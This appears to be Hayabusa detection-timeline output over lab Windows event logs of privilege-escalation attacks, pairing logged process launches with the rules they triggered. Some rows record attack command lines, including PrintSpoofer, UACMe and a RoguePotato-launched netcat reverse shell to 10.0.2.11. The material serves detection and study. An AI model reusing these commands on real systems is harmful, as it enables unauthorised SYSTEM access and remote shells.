C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k utcsvc -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.068 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.079 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : 
Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,Rule: PrivEsc - Potential Unquoted Service Exploit : Command: c:\Program Files\vulnsvc\mmm.exe : Path: C:\program.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.465 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: sihost.exe : Path: C:\Windows\System32\sihost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc : Path: C:\Windows\System32\svchost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.097 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService : Path: C:\Windows\System32\svchost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:35.125 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:35.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:37.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:40.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:40.712 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications : Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:11.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:11.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 318 0000021FF2606500 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:11.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:16.073 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Discovery - domain time : Command: ""C:\BGinfo\BGINFO.EXE"" /accepteula /ic:\bginfo\bgconfig.bgi /timer:0 : Path: C:\BGinfo\BGINFO.EXE : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:16.165 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\SecurityHealthService.exe : Path: C:\Windows\System32\SecurityHealthService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:16.965 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe -Embedding : Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:18.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe"" /background : Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:21.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe"" : Path: C:\Windows\regedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:21.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 258 0000021FF266EC20 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:26.261 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe"" : Path: C:\Windows\regedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:08.564 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:18.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:19.340 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s WinRM : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:19.629 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-05-03 03:01:54.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PrintSpoofer.exe -i -c powershell.exe : Path: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: powershell.exe : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: PrintSpoofer.exe -i -c powershell.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : 
Parent Command: powershell.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-07 22:13:02.481 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\ChangePk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx +2020-05-10 09:09:36.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" : Path: C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:36.709 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:11:16.714 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-12 08:21:56.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e 
cmd.exe"" -l 9999 : Path: C:\Users\IEUser\Tools\PrivEsc\RoguePotato.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe : Path: C:\Users\IEUser\Tools\Misc\nc64.exe : User: NT AUTHORITY\SYSTEM : Parent Command: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.661 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Akagi.exe 58 c:\Windows\System32\cmd.exe : Path: C:\Users\IEUser\Tools\PrivEsc\Akagi.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 328 310 0000028A37652590 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 : Path: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe 
/Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 09:28:16.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 09:28:52.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 09:28:52.914 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost 
